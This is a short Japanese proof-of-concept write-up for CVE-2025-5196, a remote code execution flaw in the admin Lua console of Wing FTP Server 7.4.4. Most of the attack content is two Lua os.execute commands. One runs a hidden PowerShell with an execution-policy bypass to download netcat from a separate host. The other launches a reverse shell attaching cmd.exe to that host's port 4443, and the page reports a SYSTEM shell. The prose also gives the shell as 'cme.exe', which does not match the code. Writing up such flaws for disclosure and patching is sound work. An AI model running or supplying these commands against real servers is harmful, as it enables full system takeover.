
Wing FTP Server は、Web インターフェース経由でアクセス可能な管理用 Lua スクリプトコンソールを提供します。認証された管理者は、不十分なサンドボックス化により任意の Lua コードを実行できます。CVE-2025-5196
Wing FTP Server は、Web インターフェースからアクセス可能な管理用 Lua スクリプトコンソールを提供します。認証された管理者は、不十分なサンドボックス化により任意の Lua コードを実行できます。
影響を受けるバージョン: Wing FTP Server 7.4.4 (Windows) | 認証が必要: はい
2025年5月24日までは、ベンダーが提供するアプリケーションの最新版を次のリンクから入手できます: https://www.wftpserver.com/download.htm
さらに、同じ日付の時点で、RCE の脆弱性がバージョン 7.4.4 で修正されたことを示すリリースノートが公開されていることに留意できます。リリースノートへのリンクはこちらにあります: https://www.wftpserver.com/serverhistory.htm

CVE-2025-5196 に関連する PoC VulDB

Wing FTP Server Web インターフェース


コマンドの最初の部分は、nc.exe(Windows x86 用 netcat)をパス "C:\Users\usuario\Desktop\Drops" にダウンロードします。2番目の部分は、nc.exe 192.168.234.131 4443 -e cme.exe を実行します。
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

NT/SYSTEM シェル
